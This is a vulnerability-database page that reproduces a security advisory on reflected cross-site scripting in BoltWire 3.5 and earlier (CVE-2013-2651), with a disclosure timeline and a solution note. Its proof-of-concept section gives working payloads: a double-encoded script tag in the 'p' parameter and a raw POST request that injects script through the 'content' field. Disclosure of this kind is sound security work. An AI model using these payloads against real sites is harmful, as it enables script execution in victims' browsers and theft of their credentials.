Vulners
Lucene search
BoltWire 3.5 Cross Site Scripting
🗓️ 09 Oct 2013 00:00:00Reported by Manuel Garcia CardenasType 
packetstorm🔗 packetstormsecurity.com👁 43 Views
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | BoltWire 3.5 Cross Site Scripting Vulnerability | 10 Oct 201300:00 | – | zdt |
 | CVE-2013-2651 | 23 Oct 201315:00 | – | cve |
 | CVE-2013-2651 | 23 Oct 201315:00 | – | cvelist |
 | EUVD-2013-2590 | 7 Oct 202500:30 | – | euvd |
 | CVE-2013-2651 | 23 Oct 201316:54 | – | nvd |
 | BoltWire <= 3.5 Multiple XSS Vulnerabilities | 7 Nov 201300:00 | – | openvas |
 | Cross site scripting | 23 Oct 201316:54 | – | prion |
 | [ISecAuditors Security Advisories] Multiple Reflected XSS vulnerabilities in BoltWire <= v3.5 | 13 Oct 201300:00 | – | securityvulns |
| Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) | 13 Oct 201300:00 | – | securityvulns |
`=============================================
INTERNET SECURITY AUDITORS ALERT 2013-010
- Original release date: March 20th, 2013
- Last revised: March 25th, 2013
- Discovered by: Manuel Garcia Cardenas
- Severity: 4,8/10 (CVSS Base Score)
- CVE-ID: CVE-2013-2651
=============================================
I. VULNERABILITY
-------------------------
Multiple Reflected XSS vulnerabilities in BoltWire <= v3.5
II. BACKGROUND
-------------------------
BoltWire is an easy to use web development engine with surprizing
flexibility and power. It has
the various strengths of a wiki, cms, database, search engine, and more,
all rolled together into
a software system of ground-breaking design.
III. DESCRIPTION
-------------------------
Has been detected a reflected XSS vulnerability in BoltWire <=3.5 , that
allows the execution of
arbitrary HTML/script code to be executed in the context of the victim
user's browser.
The code injection is done through the parameter "p" and "content" in
the page index.php.
IV. PROOF OF CONCEPT
-------------------------
The application does not validate the double encoding of the "p" parameter.
Malicious Request ("p" parameter):
Not vulnerable:
http://vulnerablesite.com/boltwire/index.php?p=<script>alert("XSS")</script>
Not Vulnerable:
http://vulnerablesite.com/boltwire/index.php?p=%3cscript%3ealert%28%22XSS
%22%29%3c%2fscript%3e
Vulnerable:
http://vulnerablesite.com/boltwire/index.php?p=%253cscript%253ealert%2528%2522XSS
%2522%2529%253c%252fscript%253e
Malicious Request ("content" parameter):
POST /bolt/field/index.php?p=action.create HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101
Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=bf1bcm8370oqt84lh8nvrdklb7;
BOLTsession=bf1bcm8370oqt84lh8nvrdklb7
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 121
target=example&content=</textarea><script>alert("XSS")</script>&submit=PREVIEW>
V. BUSINESS IMPACT
-------------------------
An attacker can execute arbitrary HTML or script code in a targeted
user's browser, this can
leverage to steal sensitive information as user credentials, personal
data, etc.
VI. SYSTEMS AFFECTED
-------------------------
All Versions of BoltWire <= v3.5
VII. SOLUTION
-------------------------
All data received by the application and can be modified by the user,
before making any kind of
transaction with them must be validated.
VIII. REFERENCES
-------------------------
http://www.boltwire.com
http://www.isecauditors.com
IX. CREDITS
-------------------------
This vulnerability has been discovered
by Manuel García Cárdenas (mgarcia (at) isecauditors (dot) com).
X. REVISION HISTORY
------------------------
March 20, 2013 1: Initial release
XI. DISCLOSURE TIMELINE
-------------------------
March 20, 2013: Vulnerability acquired by
Internet Security Auditors (www.isecauditors.com)
March 25, 2013: Sent to Devel Team.
October 09, 2013: After some months without feedback, we do a
full-disclosure
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or
guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse
of this information.
XIII. ABOUT
-------------------------
Internet Security Auditors is a Spain based leader in web application
testing, network security,
penetration testing, security compliance implementation and assessing.
Our clients include some
of the largest companies in areas such as finance, telecommunications,
insurance, ITC, etc.
We are vendor independent provider with a deep expertise since 2001. Our
efforts in R&D include
vulnerability research, open security project collaboration and
whitepapers, presentations and
security events participation and promotion. For further information
regarding our security
services, contact us.
XIV. FOLLOW US
-------------------------
You can follow Internet Security Auditors, news and security advisories at:
https://www.facebook.com/ISecAuditors
https://twitter.com/ISecAuditors
http://www.linkedin.com/company/internet-security-auditors
http://www.youtube.com/user/ISecAuditors
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Oct 2013 00:00Current
6.6Medium risk
Vulners AI Score6.6
EPSS0.00261